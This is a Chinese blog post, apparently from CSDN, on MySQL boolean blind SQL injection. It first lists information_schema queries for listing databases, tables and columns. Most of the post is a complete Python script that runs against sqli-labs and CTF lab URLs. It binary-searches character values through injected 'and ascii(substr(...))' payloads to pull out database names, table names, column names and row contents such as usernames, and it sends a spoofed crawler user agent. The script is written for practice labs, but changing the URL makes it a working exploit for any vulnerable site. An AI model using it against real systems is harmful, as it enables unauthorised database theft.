当前位置:网站首页>mysql bool盲注
mysql bool盲注
2022-08-03 03:52:00 【[email protected]】
MySQL中查询所有数据库名和表名
1.查询所有数据库
show databases;
(select group_concat(schema_name ) from information_schema.schemata)
2.查询指定数据库中所有表名
(select group_concat(table_name) from information_schema.tables where table_schema=database())
3.查询指定表中的所有字段名
(select group_concat(column_name) from information_schema.columns where table_name='表名')
4.查询指定字段中的内容
(select group_concat(字段名) from 数据库.表名) ,(select group_concat(username) from security.users)
group_concat(字段) from (表名)
import requests
from urllib.parse import quote
session = requests.session()
# url = "http://61.147.171.105:62055/view.php?no=1"
url="http://35bc1ed6-1ac7-4e98-8a8f-becd773b3277.node4.buuoj.cn/Less-1/?id=1'" #闭合方式在这里体现
# 爬虫请求头
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
'Referer': "http://www.baidu.com/"
}
# 用户请求头
# headers = {
# 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
# 'Referer': "https://creator.douyin.com/"
# }
#设置访问正确时的判断数据
success_text="Your Login name"
#爆当前数据库名长度
def Database_length():
database_length=0
for i in range(1,10):
payload = quote(" and length(database())="+str(i)+"#")#对特殊符号进行url编码
text=session.get(url+payload,headers=headers).text
if success_text in text:
database_length=i
break
print("database_length:",database_length)
# 爆当前数据库名字
def Database_name():
database_name=""
for i in range(1,100):
left, right = 32,126
while (1):
mid = (left + right) // 2
payload1 =" and ascii(substr(database(), " + str(i) + ", 1)) = " + str(mid)+"#"
text1=requests.get(url+quote(payload1) , headers=headers).text
if (success_text in text1):
database_name+=chr(mid)
print(database_name)
break
payload2 = quote(" and ascii(substr(database(), " + str(i) + ", 1)) > " + str(mid)+"#")
text2 = requests.get(url+payload2 , headers=headers).text
if (success_text in text2):
left=mid
else:
right=mid
print("database_name:", database_name)
# 爆数据库名
def Databases_names():
databases_names=""
for i in range(1,1000):
left, right = 32,126
while (1):
mid = (left + right) // 2
payload1 = " and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # "%(i,mid)
text1=requests.get(url+quote(payload1) , headers=headers).text
if (success_text in text1):
databases_names+=chr(mid)
print(databases_names)
break
payload2 = " and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # "%(i,mid)
text2 = requests.get(url+quote(payload2) , headers=headers).text
if (success_text in text2):
left=mid
else:
right=mid
print("databases_names:",databases_names)
# 爆表名
def Tables_name(database_name):
tables_name=""
for i in range(1,1000):
left, right = 32,126
while (1):
mid = (left + right) // 2
payload1 = " and (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d # "%(i,database_name,mid)
text1=requests.get(url+quote(payload1) , headers=headers).text
if (success_text in text1):
tables_name+=chr(mid)
print(tables_name)
break
payload2 = " and (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d # "%(i,database_name,mid)
text2 = requests.get(url+quote(payload2) , headers=headers).text
if (success_text in text2):
left=mid
else:
right=mid
print("tables_names:",tables_name)
# 爆列名
def Columns_name(table_name):
columns_name=""
for i in range(1,1000):
left, right = 32,126
while (1):
mid = (left + right) // 2
payload1 = " and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # "%(i,table_name,mid)
text1=requests.get(url+quote(payload1) , headers=headers).text
if (success_text in text1):
columns_name+=chr(mid)
print(columns_name)
break
payload2 = " and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # "%(i,table_name,mid)
text2 = requests.get(url+quote(payload2) , headers=headers).text
if (success_text in text2):
left=mid
else:
right=mid
print("tables_names:",columns_name)
# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name,table_name,columns_name):
dump=""
for i in range(1,1000):
left, right = 32,126
while (1):
mid = (left + right) // 2
payload1 = " and (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # "%(columns_name,i,database_name,table_name,mid)
text1=requests.get(url+quote(payload1) , headers=headers).text
if (success_text in text1):
dump+=chr(mid)
print(dump)
break
payload2 = " and (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # "%(columns_name,i,database_name,table_name,mid)
text2 = requests.get(url+quote(payload2) , headers=headers).text
if (success_text in text2):
left=mid
else:
right=mid
print("dump:",dump)
# 爆当前数据库长度
# Database_length()
#爆当前数据库名
# Database_name()
# 爆所有数据库名
Databases_names()
# 爆指定数据库表名
# 参数为数据库名字
# Tables_name("security")
# 爆指定表名的列名
# 参数为表名
# Columns_name("emails")
# 爆指定数据库、表、列名的内容
# Dump("security","users","username")版权声明
本文为[[email protected]]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_61774705/article/details/126119974
边栏推荐
猜你喜欢
随机推荐
金仓数据库 MySQL 至 KingbaseES 迁移最佳实践(3. MySQL 数据库移植实战)
富瑞宣布战略交易,以简化运营,持续专注于打造领先的独立全服务型全球投行公司
Smart fitness gesture recognition: PP - TinyPose build AI virtual trainer!
软件测试技术之如何编写测试用例(2)
【剑指offer】——股票的最大利润
(2022牛客多校五)G-KFC Crazy Thursday(二分+哈希)
多线程使用哈希表
【STM32】入门(三):按键使用-GPIO端口输出控制
Linux-Docker-Redis安装
谷粒商城一些疑问总结
(一)Nacos注册中心集群环境搭建
浅谈用KUSTO查询语言(KQL)在Azure Synapse Analytics(Azure SQL DW)审计某DB账号的操作记录
lc marathon 8.2
基于Streamlit的YOLOv5ToX模型转换工具(适用YOLOv5训练出来的模型转化为任何格式)
【剑指offer】——16.数值的整数次方
数值类型转换02
高等代数_证明_不同特征值的特征向量线性无关
道通转债,微芯转债,博22转债上市价格预测
TCP相关面试常问
SeleniumWebDriver扩展插件开发